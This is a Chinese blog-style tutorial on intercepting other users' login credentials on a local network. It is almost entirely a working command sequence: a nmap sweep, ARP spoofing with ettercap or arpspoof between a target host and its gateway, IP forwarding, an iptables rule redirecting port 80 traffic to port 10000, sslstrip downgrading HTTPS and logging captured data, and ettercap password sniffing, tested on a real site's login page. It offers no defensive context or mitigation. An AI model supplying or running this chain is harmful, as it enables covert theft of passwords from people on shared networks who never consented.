本文主要是介绍基于https的内网嗅探-ssl数据嗅探工具sslstrip,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
内网扫描 nmap -sP 192.168.1.1/24
ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/
ettercap使用方法,参数详解:
-P 使用插件
-T 使用基于文本界面
-q 启动安静模式(不回显)
-M 启动ARP欺骗攻击
192.168.1.102/ 被攻击的目标主机,第二个192.168.1.1网关ip
或者 命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102
开启转发,重新开启一个命令行:
echo "1">/proc/sys/net/ipv4/ip_forward
使用Iptables过滤数据包
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
参数讲解:
-t:命令要操作匹配的表(net这个表表示被查询时遇到了新差生的连接包)
Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)
-A表示在选择的链后加入更多选项
–p指被过滤包的协议
–destination-port 80指被过滤包的目的端口是80 -j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输
然后我们使用sslstrip监听10000端口,命令行如下
sslstrip -p -l 10000 -w log.txt
sslstrip -a -f -k
测试登录网址 登录 - 开心网
欺骗成功,然后利用ettercap进行https/http密码嗅探
Kali终端输入:ettercap -Tq -i eth0
-T:启动文本模式 q:安静模式 -i:攻击机网卡
关闭命令 -A 改成 -D
iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
这篇关于基于https的内网嗅探-ssl数据嗅探工具sslstrip的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!